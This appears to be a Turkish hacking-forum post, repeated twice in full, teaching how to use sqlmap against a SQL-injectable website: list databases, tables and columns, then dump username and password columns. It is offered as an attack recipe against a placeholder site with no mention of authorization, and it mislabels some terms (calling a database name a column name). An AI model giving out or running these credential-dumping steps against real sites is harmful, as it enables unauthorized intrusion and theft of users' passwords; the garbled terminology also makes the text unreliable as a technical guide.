tüm THT ailesine selamlar
öncelikle açıklı SQL açıklı olan sitemzi örneksite.com olarak algılayalım
sqlmap.py -u www.örneksite.com --dbs komutu eger injection başarılı olmuş ise karşmıza sitenin columnları çıkacaktır
karşımıza gelen columlardan birini çekmek istiyorsanız
sqlmap.py -u www.örneksite.com -D kolon_adı --tables
karşınıza herzaman 2 ya da daha fazla database çıkar 1 tanesi genelde üstteki den pek tatmin edici
bilgiler alamazsınız o yüzden 2. olanı seçiniz
sonra tabloların içindeki kolumları çekmek için
sqlmap -u www.örenkesite.com -D kolon_adı -T tablo --columns
buradan sonra karşımıza öıkan tablo kolumlarında kullanıcı adı ve şiferyi çekmek istiyoruz diyelim onun içinde bu kodu kullanacagız
sqlmap -u www.örneksite.com -D kolon_adı -T tablo -C kullanici adı,parola --dump
şimdi kısaca parametreleri özetlemek isityorum
-D: Bu parametre ile veri tabanı adını belirtmiş olduk
--tables: Belirttiğimiz veri tabanındaki tablo isimlerini getirmek için bu parametre kullanılır.
-T: Tablo isimleri de alındıktan sonra kolonlarına ulaşılması istenen tablo adı bu parametre ile birlikte yazılır
--columns: Adı belirtilen tablodaki kolonlar getirilir
-C: İstenilen kolon adı yazılır.
--dump: Kolonlarda yer alan veriler ekrana yansıtılır
şimdi ise tüm kodları sırasına göre teker teker verecegim
sqlmap -u www.örneksite.com --dbs
sqlmap -u www.örneksite.com -D kolon_adı --tables
sqlmap -u www.örneksite.com -D kolon_adı -T tablo --columns
sqlmap -u www.örneksite.com -D kolon_adı -T tablo -C kullanici adı,parola --dump
öncelikle açıklı SQL açıklı olan sitemzi örneksite.com olarak algılayalım
sqlmap.py -u www.örneksite.com --dbs komutu eger injection başarılı olmuş ise karşmıza sitenin columnları çıkacaktır
karşımıza gelen columlardan birini çekmek istiyorsanız
sqlmap.py -u www.örneksite.com -D kolon_adı --tables
karşınıza herzaman 2 ya da daha fazla database çıkar 1 tanesi genelde üstteki den pek tatmin edici
bilgiler alamazsınız o yüzden 2. olanı seçiniz
sonra tabloların içindeki kolumları çekmek için
sqlmap -u www.örenkesite.com -D kolon_adı -T tablo --columns
buradan sonra karşımıza öıkan tablo kolumlarında kullanıcı adı ve şiferyi çekmek istiyoruz diyelim onun içinde bu kodu kullanacagız
sqlmap -u www.örneksite.com -D kolon_adı -T tablo -C kullanici adı,parola --dump
şimdi kısaca parametreleri özetlemek isityorum
-D: Bu parametre ile veri tabanı adını belirtmiş olduk
--tables: Belirttiğimiz veri tabanındaki tablo isimlerini getirmek için bu parametre kullanılır.
-T: Tablo isimleri de alındıktan sonra kolonlarına ulaşılması istenen tablo adı bu parametre ile birlikte yazılır
--columns: Adı belirtilen tablodaki kolonlar getirilir
-C: İstenilen kolon adı yazılır.
--dump: Kolonlarda yer alan veriler ekrana yansıtılır
şimdi ise tüm kodları sırasına göre teker teker verecegim
sqlmap -u www.örneksite.com --dbs
sqlmap -u www.örneksite.com -D kolon_adı --tables
sqlmap -u www.örneksite.com -D kolon_adı -T tablo --columns
sqlmap -u www.örneksite.com -D kolon_adı -T tablo -C kullanici adı,parola --dump